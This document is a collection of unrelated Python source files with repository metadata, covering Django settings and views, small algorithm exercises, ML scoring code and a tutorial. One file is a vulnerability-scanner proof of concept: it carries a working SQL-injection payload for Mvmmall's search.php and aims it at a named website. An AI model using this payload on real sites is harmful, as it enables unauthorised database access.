'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', 'django.template.loaders.eggs.Loader', ) # Template files (html+django templates) TEMPLATE_DIRS = ( os.path.join(BASE_DIR, "templates"), ) # Production code if DEBUG==False: #parse database configuration from $DATABASE_URL import dj_database_url DATABASES['default'] = dj_database_url.config() # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] # Static asset configuration import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) STATIC_ROOT = 'staticfiles' STATIC_URL = '/static/' STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), )
0c448d5d9533485b666d5f11510eb4bdf0e13294
9fa07ba96a5330712bb1f1d0874375e6f4923ce7
/wait/www/387.py
3d6ab8263419dea2fd32e7413af8f4570a1f4842
[]
no_license
Ajatars/Ajatar
cf4460d881b18095ce968c883e68500d44f90570
943b71285e6b74ae38861aa305d26b0a9bef4050
refs/heads/master
2020-06-02T02:14:05.989075
2019-06-10T02:48:10
2019-06-10T02:48:10
191,002,958
11
2
null
null
null
null
UTF-8
Python
false
false
981
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name  : Mvmmall search.php SQL Injection
Reference : http://www.wooyun.org/bugs/wooyun-2011-01732
Author    : NoName
"""

import re
from urllib.parse import urlparse


def assign(service, arg):
    if service == "www":
        r = urlparse(arg)
        return True, '%s://%s/' % (r.scheme, r.netloc)


def audit(arg):
    payload = "search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20md5(12345))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23"
    code, head, res, errcode, _ = curl.curl(arg + payload)
    if code == 200:
        m = re.search("827ccb0eea8a706c4c34a16891f84e7b1", res)
        if m:
            security_hole('Mvmmall search.php SQL Injection exists.')


if __name__ == '__main__':
    from dummy import *
    audit(assign('www', 'http://dajiamai.com/')[1])
707062ffa62600fed5892717cfc5efb6677b3277
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_plough.py
8524ffbb0f26cf406e78e16dbed5ed7ccee77fc1
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
427
py
# class header

class _PLOUGH():

    def __init__(self,):
        self.name = "PLOUGH"
        self.definitions = [u'a large farming tool with blades that digs the soil in fields so that seeds can be planted', u'If land is under the plough, crops are grown on it: ']
        self.parents = []
        self.childen = []
        self.properties = []
        self.jsondata = {}

        self.specie = 'nouns'

    def run(self, obj1=[], obj2=[]):
        return self.jsondata
816403dc9d93b4276bffb4d8e162c51ea13231b8
0be45470f15f12872d81f98c72e3b8528100ad27
/pointCollection/tools/RDE.py
563e437d633d241e661519931619d6cf3b3cf410
[ "MIT" ]
permissive
SmithB/pointCollection
19a43bb19b1753542f693645fe4f537c2dbf7af9
026a60eb7e2fbe5333c7a30bd8299dda44c5878e
refs/heads/master
2023-08-23T18:56:49.943934
2023-08-18T16:41:12
2023-08-18T16:41:12
220,045,965
4
8
MIT
2023-07-03T15:47:58
2019-11-06T16:51:04
Jupyter Notebook
UTF-8
Python
false
false
584
py
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 23 16:31:30 2017

@author: ben
"""

import numpy as np


def RDE(x):
    xs = x.copy()
    xs = np.isfinite(xs)   # this changes xs from values to a boolean
    if np.sum(xs) < 2:
        return np.nan
    ind = np.arange(0.5, np.sum(xs))
    LH = np.interp(np.array([0.16, 0.84]) * np.sum(xs), ind, np.sort(x[xs]))
    #print('LH =', LH)
    # trying to get some kind of a width of the data ~variance
    return (LH[1] - LH[0]) / 2.


#import scipy.stats as stats
#def RDE(x):
#    return (stats.scoreatpercentile(x, 84) - stats.scoreatpercentile(x, 16)) / 2.
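# Quick sanity check (separate sketch, assumes numpy and the RDE above): for a
# normal sample, half the spread between the 16th and 84th percentiles
# approximates one standard deviation, so RDE should land near sigma.
import numpy as np

sample = np.random.default_rng(0).normal(0.0, 2.0, 10000)
print(RDE(sample))   # expect a value close to 2.0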
ec81f69f8b35b27ca38c0fabe125ba6ef4bc3a1d
1975ee674b36084366b1bbe2c091d8f0f8795dc0
/demo/class_views.py
49ac0086b684256a0215318d23d4992296ad6f5e
[]
no_license
srikanthpragada/PYTHON_03_JULY_2018_WEBDEMO
f193213788deadcab7ac7b183328269ba1334488
56e076ad30703117cafc56d6d95449c6ec8eebb2
refs/heads/master
2020-03-25T11:45:53.128704
2018-08-23T15:29:05
2018-08-23T15:29:05
143,747,408
0
0
null
null
null
null
UTF-8
Python
false
false
877
py
from django.views.generic import TemplateView, ListView
from django.shortcuts import render
from .forms import LoginForm
from .models import Course


class ClassView1(TemplateView):
    template_name = 'class_view1.html'


class LoginView(TemplateView):
    template_name = 'login.html'

    def get(self, request):
        form = LoginForm()
        return render(request, self.template_name, {'form': form})

    def post(self, request):
        form = LoginForm(request.POST)
        if form.is_valid():
            print(form.cleaned_data['username'], form.cleaned_data['password'])
        return render(request, self.template_name, {'form': form})


# Generic View - ListView demo
class ListCourseView(ListView):
    model = Course
    template_name = "courses.html"   # default is demo/course_list.html
    context_object_name = 'courses'  # default is object_list
275aa3e362920aae1e2af84fe0380f36fa448f39
55c250525bd7198ac905b1f2f86d16a44f73e03a
/Python/pygame/pygameweb/pygameweb/db.py
57c70ca70133b811d4447037d0df7cd54b72e632
[ "BSD-2-Clause" ]
permissive
NateWeiler/Resources
213d18ba86f7cc9d845741b8571b9e2c2c6be916
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
refs/heads/master
2023-09-03T17:50:31.937137
2023-08-28T23:50:57
2023-08-28T23:50:57
267,368,545
2
1
null
2022-09-08T15:20:18
2020-05-27T16:18:17
null
UTF-8
Python
false
false
129
py
version https://git-lfs.github.com/spec/v1
oid sha256:95c026dc0e7051336cd999158979e81f159d4470489660469d0e0175c66400da
size 1274
e7e2e35e74f6f746945d6189c17e6e7c5bf68ec4
4c852fab792606580acb3f3a61b7f86ae25930b0
/Python/MIT-CompThinking/MITx600.1x/ProblemSets/wk3/L5PROBLEM5.py
5fc93127f17702a2607600df981bd5e7b2f929a5
[]
no_license
hmchen47/Programming
a9767a78a35c0844a1366391f48b205ff1588591
9637e586eee5c3c751c96bfc5bc1d098ea5b331c
refs/heads/master
2022-05-01T01:57:46.573136
2021-08-09T04:29:40
2021-08-09T04:29:40
118,053,509
2
1
null
2021-09-20T19:54:02
2018-01-19T00:06:04
Python
UTF-8
Python
false
false
259
py
#!/usr/bin/python
# _*_ coding = UTF-8 _*_


def gcdRecur(a, b):
    '''
    a, b: positive integers

    returns: a positive integer, the greatest common divisor of a & b.
    '''
    if b == 0:
        return a
    else:
        return gcdRecur(b, a % b)
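# Usage sketch: Euclid's recursion gcd(a, b) -> gcd(b, a % b) bottoms out when b == 0.
print(gcdRecur(9, 12))    # 3
print(gcdRecur(17, 12))   # 1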
055aabb9ef9a32291d0e6edb97d8a581f7df3962
2509936d814fb6cdd283c2549c518c8dfad9450c
/api/staticdata/regimes/migrations/0010_merge_20221214_1035.py
81daedc733cfa1f2e70025a26480bb78e0acf8fd
[ "MIT" ]
permissive
uktrade/lite-api
19f829119fa96de3f4862eb233845508b0fef7eb
b35792fc981220285ed9a7b3659aba460f1b207a
refs/heads/dev
2023-08-25T10:11:17.594001
2023-08-24T14:24:43
2023-08-24T14:24:43
172,914,199
4
3
MIT
2023-09-14T17:36:47
2019-02-27T12:46:22
Python
UTF-8
Python
false
false
277
py
# Generated by Django 3.2.16 on 2022-12-14 10:35

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ("regimes", "0009_update_cwc_shortened_names"),
        ("regimes", "0009_update_nsg_regimes"),
    ]

    operations = []
8158442771c431dd35672a9edc586edd0fe33d1d
e23a4f57ce5474d468258e5e63b9e23fb6011188
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/leetCode/BreadthFirstSearch/103_BinaryTreeZigzagLevelOrderTraversal.py
4445a0088162de197a6843a1be5b63a07388215c
[]
no_license
syurskyi/Python_Topics
52851ecce000cb751a3b986408efe32f0b4c0835
be331826b490b73f0a176e6abed86ef68ff2dd2b
refs/heads/master
2023-06-08T19:29:16.214395
2023-05-29T17:09:11
2023-05-29T17:09:11
220,583,118
3
2
null
2023-02-16T03:08:10
2019-11-09T02:58:47
Python
UTF-8
Python
false
false
797
py
#! /usr/bin/env python
# -*- coding: utf-8 -*-

# Definition for a binary tree node.
# class TreeNode(object):
#     def __init__(self, x):
#         self.val = x
#         self.left = None
#         self.right = None


class Solution(object):
    def zigzagLevelOrder(self, root):
        if not root:
            return []
        left2right = 1  # 1: scan the level from left to right; -1: reverse.
        ans, stack, temp = [], [root], []
        while stack:
            temp = [node.val for node in stack]
            stack = [child for node in stack
                     for child in (node.left, node.right) if child]
            ans += [temp[::left2right]]  # Pythonic way
            left2right *= -1
        return ans


"""
[]
[1]
[1,2,3]
[0,1,2,3,4,5,6,null,null,7,null,8,9,null,10]
"""
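# Usage sketch for the solution above, with TreeNode assumed to be the standard
# LeetCode definition (uncommented here for a self-contained run).
class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(3)
root.left, root.right = TreeNode(9), TreeNode(20)
root.right.left, root.right.right = TreeNode(15), TreeNode(7)

print(Solution().zigzagLevelOrder(root))   # [[3], [20, 9], [15, 7]]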
351ef3112a8105eea8a02b98a6ff6303a19eee43
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
/tests/artificial/transf_Integration/trend_LinearTrend/cycle_30/ar_/test_artificial_128_Integration_LinearTrend_30__100.py
7a5e907e035774475c35332c1022bd9fc95546df
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
jmabry/pyaf
797acdd585842474ff4ae1d9db5606877252d9b8
afbc15a851a2445a7824bf255af612dc429265af
refs/heads/master
2020-03-20T02:14:12.597970
2018-12-17T22:08:11
2018-12-17T22:08:11
137,104,552
0
0
BSD-3-Clause
2018-12-17T22:08:12
2018-06-12T17:15:43
Python
UTF-8
Python
false
false
275
py
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art


art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 30, transform = "Integration", sigma = 0.0, exog_count = 100, ar_order = 0);
42f0deaf250627b10751156d712d786cdc96ee26
6bf1b595a7f4d3cbf0995455869d438a7d0e0624
/lingvo/tasks/milan/score_functions.py
9c4ce867b372dfed657bec15a96096952923b006
[ "Apache-2.0" ]
permissive
huaxz1986/lingvo
889abc82b1bab6f37ba861c41eb480b7e89362c0
b83984577610423e3b1c6b04ca248cd23f2842f7
refs/heads/master
2022-05-15T03:29:56.903688
2022-04-02T01:41:25
2022-04-02T01:41:25
173,536,461
1
0
Apache-2.0
2019-03-03T05:52:01
2019-03-03T05:52:01
null
UTF-8
Python
false
false
1,664
py
# Lint as: python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of combination functions for dual-encoder models."""

from lingvo import compat as tf
from lingvo.core import base_layer


class DotProductScoreFunction(base_layer.BaseLayer):
  """Performs dot product combination between two encoded vectors."""

  @classmethod
  def Params(cls):
    p = super().Params()
    p.name = 'dot_product_score_function'
    return p

  def FProp(self, theta, x, y):
    """Computes pair-wise dot product similarity.

    Args:
      theta: NestedMap of variables belonging to this layer and its children.
      x: batch of encoded representations from modality x. A float32 Tensor of
        shape [x_batch_size, encoded_dim]
      y: batch of encoded representations from modality y. A float32 Tensor of
        shape [y_batch_size, encoded_dim]

    Returns:
      Pairwise dot products. A float32 Tensor with shape
      `[x_batch_size, y_batch_size]`.
    """
    return tf.matmul(x, y, transpose_b=True)
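# Standalone shape sketch (plain TensorFlow, bypassing the lingvo layer
# plumbing): FProp above is just a batched pairwise dot product.
import tensorflow as tf

x = tf.random.normal([2, 8])   # [x_batch_size, encoded_dim]
y = tf.random.normal([3, 8])   # [y_batch_size, encoded_dim]
print(tf.matmul(x, y, transpose_b=True).shape)   # (2, 3)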
31068cd2c89faea0c9efdff5214f7c0d9abac707
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/otherforms/_suffered.py
f5ba9fb4722605fcd51182e2e5bcc1348faf8603
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
224
py
# class header

class _SUFFERED():

    def __init__(self,):
        self.name = "SUFFERED"
        self.definitions = ['suffer']
        self.parents = []
        self.childen = []
        self.properties = []
        self.jsondata = {}

        self.basic = ['suffer']
231a0e1fcc8967f9072dfe360b036cfcdba74643
c105797a5b6f5aca0b892ccdadbb2697f80fb3ab
/python_base/base7/base7_3.py
7a29be88d6785d292d6f115f65d970948129502d
[]
no_license
jj1165922611/SET_hogwarts
6f987c4672bac88b021069c2f947ab5030c84982
fbc8d7363af0a4ac732d603e2bead51c91b3f1f7
refs/heads/master
2023-01-31T19:41:27.525245
2020-12-15T13:43:45
2020-12-15T13:43:45
258,734,624
0
0
null
null
null
null
UTF-8
Python
false
false
2,144
py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time        : 2020-07-21
# @Author      : Joey Jiang
# @File        : base7_3.py
# @Software    : PyCharm
# @Description : Python control-flow syntax

# 1.1 Branching
import random

a = 0
if a == 0:
    print("a=0")
else:
    print("a!=0")

# 1.2 Multiple branches
a = 1
if a == 1:
    print("a=1")
elif a == 2:
    print("a=2")
elif a == 3:
    print("a==3")
else:
    print("a!=1,2,3")

# 1.3 Exercise
# Use nested branches and then multiple branches to evaluate the piecewise function:
#        3x - 5   (x > 1)
# f(x) = x + 2    (-1 <= x <= 1)
#        5x + 3   (x < -1)

# 1.3.1 Nested branches
x = -2
if x > 1:
    print(3 * x - 5)
else:
    if x >= -1:
        print(x + 2)
    else:
        print(5 * x + 3)

# 1.3.2 Multiple branches
if x > 1:
    print(3 * x - 5)
elif x >= -1:
    print(x + 2)
else:
    print(5 * x + 3)

# 2.1 Exercise
# Sum the integers from 1 to 100
sum1 = 0
for i in range(1, 101):
    sum1 = sum1 + i
print(sum1)

# 2.2 Exercise
# Add a branch to sum the even numbers between 1 and 100
sum2 = 0
for i in range(1, 101):
    if i % 2 == 0:
        sum2 = sum2 + i
print(sum2)

# 2.3 Exercise
# Sum the even numbers between 1 and 100 in Python
sum3 = 0
for i in range(2, 101):
    if i % 2 == 0:
        sum3 = sum3 + i
print(sum3)

# 3. while loops
# 3.1 while...else
while_a = 1
while while_a == 1:
    print("while_a=1")
    while_a = while_a + 1
else:
    print("while_a!=1")
    print(while_a)

# 3.2 Simple statement group
flag = 10
while flag == 10:
    flag = flag + 1
else:
    print(flag)

# 4. break statement
for i in range(4):
    if i == 2:
        break
    print("i=", i)

# 5. continue statement
for j in range(4):
    if j == 2:
        continue
    print("j=", j)

# 6. Exercise
"""
Number-guessing game: the computer picks a random integer between 1 and 100
and the player guesses it; the computer answers "a bit too big", "a bit too
small", or "correct" depending on the guess.
"""
guess_number = random.randint(1, 100)
print(guess_number)
while True:
    number = int(input("Enter an integer between 1 and 100 > "))
    if number == guess_number:
        print("Correct!")
        break
    elif number > guess_number:
        print("A bit too big")
    else:
        print("A bit too small")
2b6b3d0ed44ecf20e0b302e6ccd0aa6574a753fa
22cbb7cffc3e5cf53fe87d2db216fdb88c8b7a8c
/stems/gis/convert.py
e26ac0443e6bd20f52888999784f13231793fecd
[ "BSD-3-Clause" ]
permissive
ceholden/stems
838eb496978f7b68ae72988e0469c60e8730cb9c
2e219eb76a44d6897881642635103b3353fc5539
refs/heads/master
2022-02-12T21:56:41.939073
2019-08-19T23:09:49
2019-08-19T23:09:49
164,480,487
3
2
null
null
null
null
UTF-8
Python
false
false
5,186
py
""" GIS variable conversion library Functions here are convenient ways of going from various representations of GIS information used in this stack (e.g., WKT) to the following representations: * Coordinate Reference System * :py:class:`rasterio.crs.CRS` * Geotransform * :py:class:`affine.Affine` * Bounding Box * :py:class:`rasterio.coords.BoundingBox` * Bounds * :py:class:`shapely.geom.Polygon` """ from functools import singledispatch import logging from affine import Affine import numpy as np from osgeo import osr from rasterio.coords import BoundingBox from rasterio.crs import CRS from rasterio.errors import CRSError import shapely.geometry from ..utils import (find_subclasses, register_multi_singledispatch) logger = logging.getLogger() LIST_TYPE = (tuple, list, np.ndarray, ) # XARRAY_TYPE = (xr.Dataset, xr.DataArray) GEOM_TYPE = find_subclasses(shapely.geometry.base.BaseGeometry) # ============================================================================ # Affine geotransform @singledispatch def to_transform(value, from_gdal=False): """ Convert input into an :py:class:`affine.Affine` transform Parameters ---------- value : Affine or iterable 6 numbers representing affine transform from_gdal : bool, optional If `value` is a tuple or list, specifies if transform is GDAL variety (True) or rasterio/affine (False) Returns ------- affine.Affine Affine transform """ raise _CANT_CONVERT(value) @to_transform.register(Affine) def _to_transform_affine(value, from_gdal=False): return value @register_multi_singledispatch(to_transform, LIST_TYPE) def _to_transform_iter(value, from_gdal=False): if from_gdal: return Affine.from_gdal(*value[:6]) else: return Affine(*value[:6]) @to_transform.register(str) def _to_transform_str(value, from_gdal=False, sep=','): return _to_transform_iter([float(v) for v in value.split(sep)]) # ============================================================================ # CRS # TODO: Dispatch function for Cartopy @singledispatch def to_crs(value): """ Convert a CRS representation to a :py:class:`rasterio.crs.CRS` Parameters ---------- value : str, int, dict, or osr.SpatialReference Coordinate reference system as WKT, Proj.4 string, EPSG code, rasterio-compatible proj4 attributes in a dict, or OSR definition Returns ------- rasterio.crs.CRS CRS """ raise _CANT_CONVERT(value) @to_crs.register(CRS) def _to_crs_crs(value): return value @to_crs.register(str) def _to_crs_str(value): # After rasterio=1.0.14 WKT is backbone so try it first try: crs_ = CRS.from_wkt(value) crs_.is_valid except CRSError as err: logger.debug('Could not parse CRS as WKT', err) try: crs_ = CRS.from_string(value) crs_.is_valid except CRSError as err: logger.debug('Could not parse CRS as Proj4', err) raise CRSError('Could not interpret CRS input as ' 'either WKT or Proj4') return crs_ @to_crs.register(int) def _to_crs_epsg(value): return CRS.from_epsg(value) @to_crs.register(dict) def _to_crs_dict(value): return CRS(value) @to_crs.register(osr.SpatialReference) def _to_crs_osr(value): return CRS.from_wkt(value.ExportToWkt()) # ============================================================================ # BoundingBox @singledispatch def to_bounds(value): """ Convert input to a :py:class:`rasterio.coords.BoundingBox` Parameters ---------- value : iterable, or Polygon Input containing some geographic information Returns ------- BoundingBox Bounding box (left, bottom, right, top). 
Also described as (minx, miny, maxx, maxy) """ raise _CANT_CONVERT(value) @to_bounds.register(BoundingBox) def _to_bounds_bounds(value): return value @register_multi_singledispatch(to_bounds, LIST_TYPE) def _to_bounds_iter(value): return BoundingBox(*value) @register_multi_singledispatch(to_bounds, GEOM_TYPE) def _to_bounds_geom(value): return BoundingBox(*value.bounds) # ============================================================================ # Polygon @singledispatch def to_bbox(value): """ Convert input a bounding box :py:class:`shapely.geometry.Polygon` Parameters ---------- value : BoundingBox Object representing a bounding box, or an xarray object with coords we can use to calculate one from Returns ------- shapely.geometry.Polygon BoundingBox as a polygon """ raise _CANT_CONVERT(value) @register_multi_singledispatch(to_bbox, GEOM_TYPE) def _to_bbox_geom(value): return _to_bbox_bounds(BoundingBox(*value.bounds)) @to_bbox.register(BoundingBox) def _to_bbox_bounds(value): return shapely.geometry.box(*value) # ============================================================================ # UTILITIES def _CANT_CONVERT(obj): return TypeError(f"Don't know how to convert this type: {type(obj)}")
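# Usage sketch (hypothetical geotransform values; assumes the module's
# dependencies resolve so it can be imported). A GDAL geotransform is ordered
# (c, a, b, f, d, e), so the same six numbers need from_gdal=True to produce
# the rasterio/affine ordering:
from affine import Affine

gt = (443000.0, 30.0, 0.0, 4600000.0, 0.0, -30.0)   # hypothetical 30 m UTM grid
assert to_transform(gt, from_gdal=True) == Affine(30.0, 0.0, 443000.0,
                                                  0.0, -30.0, 4600000.0)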
7f9a2d07182faa806f9337f02a6a0ce4035514fd
0676f6e4d3510a0305d29aa0b1fe740d538d3b63
/Python/SImplifyPline/CleanUpPolyline.py
1ce7d7116eb272886ed20d4186ae8a3b571c98fb
[ "LicenseRef-scancode-warranty-disclaimer" ]
no_license
pgolay/PG_Scripts
f70ffe7e5ca07acd6f4caedc9a9aec566542da7c
796704a7daa6ac222a40bb02afdb599f74a6b0d4
refs/heads/master
2021-01-19T16:53:41.525879
2017-02-07T18:26:10
2017-02-07T18:26:10
2,730,362
9
1
null
2016-12-30T17:58:08
2011-11-08T00:04:33
Python
UTF-8
Python
false
false
1,898
py
import Rhino
import scriptcontext as sc

"""
Cleans up by collapsing tiny segments in a polyline.
"""

def CleanUpPolyline():
    while True:
        tol = sc.doc.ModelAbsoluteTolerance
        if sc.sticky.has_key("PLineSimplifyTol"):
            tol = sc.sticky["PLineSimplifyTol"]
        go = Rhino.Input.Custom.GetObject()
        go.AcceptNumber(True, False)
        go.GeometryFilter = Rhino.DocObjects.ObjectType.Curve
        opDblTol = Rhino.Input.Custom.OptionDouble(tol)
        go.AddOptionDouble("SegmentTolerance", opDblTol)
        result = go.Get()

        if go.CommandResult() != Rhino.Commands.Result.Success:
            return

        if result == Rhino.Input.GetResult.Object:
            if type(go.Object(0).Geometry()) == Rhino.Geometry.PolylineCurve:
                curve = go.Object(0).Geometry()
                rc, pLine = curve.TryGetPolyline()
                pLineId = go.Object(0).ObjectId
            else:
                sc.doc.Objects.UnselectAll()
                sc.doc.Views.Redraw()
                print "Sorry, that was not a polyline."
                continue
            break

        elif result == Rhino.Input.GetResult.Option:
            tol = opDblTol.CurrentValue
            sc.sticky["PLineSimplifyTol"] = tol
            continue

        elif result == Rhino.Input.GetResult.Number:
            tol = go.Number()
            sc.sticky["PLineSimplifyTol"] = tol
            continue

        break

    count = pLine.CollapseShortSegments(tol)

    if count != 0:
        sc.doc.Objects.Replace(pLineId, pLine)
        sc.doc.Views.Redraw()
        print str(count) + " short segments were collapsed."
    else:
        print "No short segments were collapsed."
    pass

if __name__ == "__main__":
    CleanUpPolyline()
a33b2f9f3cd62ddd7189114556f08b0144aad7c6
b08d42933ac06045905d7c005ca9c114ed3aecc0
/src/coefSubset/evaluate/ranks/tenth/rank_2p49_Q.py
c80b9b7c96acce81b347d895d8286c78c576e7d8
[]
no_license
TanemuraKiyoto/PPI-native-detection-via-LR
d148d53f5eb60a4dda5318b371a3048e3f662725
897e7188b0da94e87126a4acc0c9a6ff44a64574
refs/heads/master
2022-12-05T11:59:01.014309
2020-08-10T00:41:17
2020-08-10T00:41:17
225,272,083
1
0
null
null
null
null
UTF-8
Python
false
false
3,204
py
# 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking.
# This script returns a ranking of the native protein-protein complex among a decoy set. For
# convenience, I will define as a function and will call in a general performance assessment script.

# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the
# for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the
# calculation on one CSV file only. Thus instead of a function to import in other scripts, they
# will be individual jobs parallelized as individual jobs in the queue.

import os
import pandas as pd
import numpy as np
import pickle

os.chdir('/mnt/scratch/tanemur1/')

# Read the model and trainFile
testFile = '2p49.csv'
identifier = 'Q'
thresholdCoef = 0.1
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/tenth/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/tenth/ranks/'
pdbID = testFile[:4]

with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
    clf = pickle.load(f)

result = pd.DataFrame()
scoreList = []

df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
df1 = df1.reindex(sorted(df1.columns), axis = 1)

# Drop features with coefficients below threshold
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs = coefs[np.abs(coefs['coefficients']) < thresholdCoef]
dropList = list(coefs.index)
del coefs
df1.drop(dropList, axis = 1, inplace = True)

with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
    scaler = pickle.load(g)

for i in range(len(df1)):
    # subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]].
    # Also some input files have 'class' column. This is erroneous and is removed.
    df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
    df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
    # Standardize input DF using the standard scaler used for training data.
    df2 = scaler.transform(df2)
    # Predict class of each comparison descriptor and sum the classes to obtain score.
    # Higher score corresponds to more native-like complex.
    predictions = clf.predict(df2)
    score = sum(predictions)
    scoreList.append(score)

# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column.
# Note: lower rank corresponds to more native-like complex.
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)

with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
    result.to_csv(h)
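# Toy sketch of the scoring idea in the loop above (invented data, with a
# threshold function standing in for clf.predict): each candidate is scored by
# how often the classifier favours it in pairwise comparisons against every
# other candidate, after dropping the trivial self-comparison.
import numpy as np

features = np.array([[1.0, 2.0], [0.5, 1.5], [2.0, 3.0]])          # 3 candidates
favours_first = lambda diffs: (diffs.sum(axis=1) > 0).astype(int)  # stand-in predictor

for i in range(len(features)):
    diffs = np.delete(features[i] - features, i, axis=0)   # drop self-comparison
    print(i, favours_first(diffs).sum())                   # candidate 2 scores highest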
6e1066a32d3b678c93a683c91c32ca9925549774
72d010d00355fc977a291c29eb18aeb385b8a9b0
/MPK261/__init__.py
1878e1129184af07da8510e9e370e01adae46916
[]
no_license
maratbakirov/AbletonLive10_MIDIRemoteScripts
bf0749c5c4cce8e83b23f14f671e52752702539d
ed1174d9959b20ed05fb099f0461bbc006bfbb79
refs/heads/master
2021-06-16T19:58:34.038163
2021-05-09T11:46:46
2021-05-09T11:46:46
203,174,328
0
0
null
2019-08-19T13:04:23
2019-08-19T13:04:22
null
UTF-8
Python
false
false
741
py
# Embedded file name: /Users/versonator/Jenkins/live/output/mac_64_static/Release/python-bundle/MIDI Remote Scripts/MPK261/__init__.py
# Compiled at: 2018-04-23 20:27:04
from __future__ import absolute_import, print_function, unicode_literals
from .MPK261 import MPK261
from _Framework.Capabilities import controller_id, inport, outport, CONTROLLER_ID_KEY, PORTS_KEY, NOTES_CC, SCRIPT, REMOTE


def get_capabilities():
    return {CONTROLLER_ID_KEY: controller_id(vendor_id=2536,
                                             product_ids=[37],
                                             model_name='MPK261'),
            PORTS_KEY: [
                inport(props=[NOTES_CC, SCRIPT, REMOTE]),
                outport(props=[SCRIPT, REMOTE])]}


def create_instance(c_instance):
    return MPK261(c_instance)
579153317b369ad77af1c66c5cb43036e863cc19
5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa
/xiaojian/second_phase/day12/http_sever2.0.py
12ccde8198046391e24f9698efd843eacb0c011c
[]
no_license
Wellsjian/20180826
424b65f828f0174e4d568131da01dafc2a36050a
0156ad4db891a2c4b06711748d2624080578620c
refs/heads/master
2021-06-18T12:16:08.466177
2019-09-01T10:06:44
2019-09-01T10:06:44
204,462,572
0
1
null
2021-04-20T18:26:03
2019-08-26T11:38:09
JavaScript
UTF-8
Python
false
false
3,467
py
